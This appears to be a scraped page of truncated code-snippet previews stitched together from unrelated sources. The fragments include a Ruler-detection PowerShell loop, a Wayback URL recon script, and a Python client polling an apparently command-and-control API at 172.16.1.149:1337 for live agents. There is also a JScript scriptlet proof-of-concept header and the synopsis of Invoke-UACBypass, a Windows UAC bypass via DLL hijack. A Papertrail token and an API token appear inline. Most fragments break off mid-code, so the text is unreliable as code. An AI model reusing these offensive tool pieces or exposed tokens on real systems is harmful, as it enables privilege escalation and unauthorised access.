| package main | |
| import ( | |
| "crypto/tls" | |
| "fmt" | |
| "io/ioutil" | |
| "net/http" | |
| "net/url" | |
| "strings" | |
| ) |
# download logs from last 30 days
PAPERTRAIL_TOKEN=9X4cddgwe53fAbbsYh4 papertrail-download-daily.sh 30
# download logs from last 30 days & filter each through ./filter.sh
| Get-EventLog -InstanceId 4776 -LogName "Security" | ForEach-Object { | |
| $sp = $_.message -split "`n" | |
| $tmp = $sp | Select-String -Pattern 'RULER' | |
| if($tmp.count -ge 1){ | |
| Write-Host "Possible Ruler usage at: " $_.TimeGenerated | |
| $sp | Select-String -Pattern 'Logon Account:' | write-host | |
| } | |
| } |
| import requests | |
| import sys | |
| import json | |
| def waybackurls(host, with_subs): | |
| if with_subs: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host | |
| else: | |
| url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host |
| #!/usr/bin/python | |
| import json | |
| import ssl | |
| import time | |
| from urllib2 import Request, urlopen, URLError | |
| url = "https://172.16.1.149:1337/api" | |
| token = "fvcds7..." | |
| live_agents = [] |
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <!-- License: BSD3-Clause --> | |
| <script language="JScript"> | |
| <
| function Invoke-UACBypass { | |
| <# | |
| .SYNOPSIS | |
| Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy. | |
| Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None |